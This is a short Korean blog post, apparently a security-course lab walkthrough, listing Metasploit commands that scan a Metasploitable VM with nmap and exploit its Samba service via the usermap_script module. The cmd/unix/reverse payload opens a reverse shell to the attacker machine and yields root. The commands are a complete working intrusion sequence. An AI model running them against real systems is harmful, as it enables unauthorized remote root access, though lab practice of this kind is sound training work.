NCS/시스템 보안 구축
Metasploit - exploit/multi/samba/usermap_script
장성한군사
2017. 7. 10. 20:29
nmap -p 1-65535 -T4 -A -v 192.168.8.158 2>&1 | tee /var/tmp/scan.txt
cd /var/tmp
grep -i samba /var/tmp/scan.txt
msfconsole
search samba
use exploit/multi/samba/usermap_script
show payloads
set payload cmd/unix/reverse
show options
set RHOST 192.168.8.158
(This is Metasploitable's IP Address (Victim))
set RPORT 445
set LHOST 192.168.8.151
(This is BackTrack's IP Address (Attacker))
exploit
hostname
uname -a
whoami
(Notice the user is root!!!)
netstat -naop | grep 4444 > /var/tmp/samba.txt
ps -eaf | grep 4444 >> /var/tmp/samba.txt
sudo su -
Supply your msfadmin password
netstat -naop | grep 4444